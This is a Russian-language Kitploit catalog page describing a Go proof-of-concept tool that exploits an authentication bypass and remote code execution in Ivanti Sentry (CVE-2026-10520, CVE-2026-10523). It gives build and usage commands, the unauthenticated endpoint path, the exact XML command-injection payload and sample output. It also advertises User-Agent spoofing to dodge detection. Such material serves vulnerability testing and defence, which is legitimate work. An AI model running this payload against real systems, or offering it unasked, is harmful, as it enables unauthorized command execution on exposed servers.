Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-10523-Ivanti-sentry — Инструмент обнаружения концепта для обхода аутентификации и уязвимостей удаленного выполнения кода Ivanti Sentry (CVE-2026-10520, CVE-2026-10523). Отправляет специально созданные API-запросы для выполнения системных команд и проверки уязвимых развертываний. | Kitploit
Инструменты/GitHubGitHub/gagaltotal/cve-2026-10523-ivanti-sentry
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеАутентификация
GitHubgagaltotal/cve-2026-10523-ivanti-sentry

CVE-2026-10523-Ivanti-sentry

Инструмент обнаружения концепта для обхода аутентификации и уязвимостей удаленного выполнения кода Ivanti Sentry (CVE-2026-10520, CVE-2026-10523). Отправляет специально созданные API-запросы для выполнения системных команд и проверки уязвимых развертываний.

РепозиторийСайт
3132 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-10523 - Инструмент обнаружения RCE в Ivanti Sentry

Комплексный инструмент обнаружения proof-of-concept для проверки уязвимостей Ivanti Sentry, связанных с обходом аутентификации и удалённым выполнением кода. Этот инструмент выявляет системы, уязвимые к CVE-2026-10520 и CVE-2026-10523.

Обзор

Этот проект предназначен для обнаружения и проверки того, является ли экземпляр Ivanti Sentry уязвимым к критическим ошибкам обхода аутентификации и удалённого выполнения кода. Инструмент отправляет специально сформированные сообщения через конечную точку API Ivanti Sentry для выполнения системных команд и извлечения результатов, что позволяет исследователям безопасности и пентестерам выявлять уязвимые развёртывания.

Сведения об уязвимостях

CVE-2026-10520

Уязвимость обхода аутентификации в Ivanti Sentry, которая позволяет неаутентифицированный доступ к ограниченным конечным точкам API.

CVE-2026-10523

Уязвимость удалённого выполнения кода в Ivanti Sentry, которая позволяет выполнять произвольные системные команды через messaging API в сочетании с обходом аутентификации.

Возможности

  • Неаутентифицированное обнаружение уязвимых экземпляров Ivanti Sentry
  • Возможность выполнения системных команд для проверки proof-of-concept
  • Поддержка HTTP и HTTPS-соединений с обходом проверки TLS
  • Поддержка прокси для тестирования через промежуточные узлы
  • Корректное извлечение вывода команд из XML-ответов
  • Безопасная обработка ошибок с информативными сообщениями
  • Настраиваемые тайм-ауты и ограничения размера ответа
  • Требования

    • Go 1.26.4 или выше
    • Сетевой доступ к целевому экземпляру Ivanti Sentry
    • Действительный URL цели с указанием протокола (HTTP или HTTPS)

    Установка

    Клонируйте репозиторий и перейдите в каталог проекта:

    root@kitploit:~
    git clone https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry
    cd CVE-2026-10523-Ivanti-sentry
    

    Инициализируйте модуль и установите библиотеки:

    root@kitploit:~
    go mod init CVE-2026-10523-Ivanti-sentry
    go mod tidy
    

    Соберите исполняемый файл:

    root@kitploit:~
    go build -o tot_poc tot_poc.go
    

    Использование

    Снимок экрана

    Инструмент требует два обязательных параметра: URL цели и команду для выполнения.

    Базовое использование

    Снимок экрана

    Выполните простую команду на цели:

    root@kitploit:~
    ./tot_poc -url https://target.example.com:8443 -cmd "uname -a"
    

    Параметры командной строки

    • -url (обязательный): Базовый URL цели, включая протокол (например, https://127.0.0.1:8443)
    • -cmd (обязательный): Команда для выполнения при обнаружении уязвимости (например, "uname -a", "id", "whoami")
    • -p или -proxy (необязательный): Адрес и порт прокси для маршрутизации трафика (например, 127.0.0.1:8080)

    Примеры использования

    Снимок экрана

    Обнаружение уязвимости с помощью простой команды получения информации о системе:

    root@kitploit:~
    ./tot_poc -url https://192.168.1.100:8443 -cmd "uname -a"
    

    Запуск с настройкой прокси:

    root@kitploit:~
    ./tot_poc -url https://target.example.com:8443 -cmd "whoami" -proxy 127.0.0.1:8080
    

    Выполнение команды для извлечения информации о системе:

    root@kitploit:~
    ./tot_poc -url https://sentry-instance.internal:8443 -cmd "cat /etc/os-release"
    

    Вывод

    Инструмент отображает:

    1. Баннер с информацией об уязвимости
    2. URL цели, команду и конфигурацию прокси (если применимо)
    3. Сообщения о статусе в реальном времени, указывающие на ход выполнения запроса
    4. Результаты выполнения команды, если цель уязвима
    5. Сообщения об ошибках, если цель не уязвима или соединение не удалось

    Вывод при успешном обнаружении

    root@kitploit:~
    Target: https://192.168.1.100:8443
    Command: uname -a
    
    [+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
    [+] Target appears to be vulnerable.
    
    Command output:
    Linux sentry-server 5.10.0-8-generic x86_64 GNU/Linux
    

    Вывод при неуспешном обнаружении

    root@kitploit:~
    Target: https://192.168.1.100:8443
    Command: uname -a
    
    [+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
    [-] Target does not appear to be vulnerable.
    

    Технические детали

    Вектор атаки

    Инструмент эксплуатирует конечную точку /mics/api/v2/sentry/mics-config/handleMessage, доступную без аутентификации. Полезная нагрузка формируется следующим образом:

    root@kitploit:~
    message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>[COMMAND]</reqandres></commandexec>
    

    Ответ содержит вывод команды в формате XML внутри тега success.

    Функции безопасности

    • Обход проверки TLS для тестирования самоподписанных сертификатов
    • Настраиваемые HTTP-тайм-ауты для предотвращения зависания запросов
    • Ограничение размера ответа (10 МБ) для предотвращения исчерпания памяти
    • Корректная обработка ошибок при некорректных ответах
    • Подмена User-Agent для обхода простых механизмов обнаружения

    Принцип работы

    1. Разбор аргументов командной строки для получения URL цели и команды
    2. Создание HTTP-клиента с опциональной конфигурацией прокси
    3. Формирование полезной нагрузки с указанной пользователем командой
    4. Отправка POST-запроса к уязвимой конечной точке
    5. Извлечение вывода команды из структуры XML-ответа
    6. Отображение результатов или сообщений об ошибках

    Отказ от ответственности

    Этот инструмент предоставляется только для авторизованного тестирования безопасности и исследовательских целей. Пользователи несут единоличную ответственность за получение надлежащего разрешения перед тестированием любых систем. Несанкционированный доступ к компьютерным системам незаконен. Авторы не несут ответственности за неправомерное использование или ущерб, причинённый этим инструментом.

    Требования и ограничения

    • Цель должна быть уязвимым экземпляром Ivanti Sentry
    • Требуется сетевое подключение к целевой системе
    • Тайм-аут по умолчанию составляет 10 секунд на запрос
    • Максимальный размер ответа ограничен 10 МБ
    • Эффективен только для систем, работающих на уязвимых версиях Ivanti Sentry
    • Проверка TLS-сертификатов отключена в целях тестирования

    Автор

    GhostGTR666 - Gagaltotal666

    Репозиторий

    https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry

    Лицензия

    Этот проект предоставляется как есть для исследовательских и образовательных целей в области безопасности.

    Ссылки

    • CVE-2026-10520: Обход аутентификации в Ivanti Sentry
    • CVE-2026-10523: Удалённое выполнение кода в Ivanti Sentry
    Скачать инструмент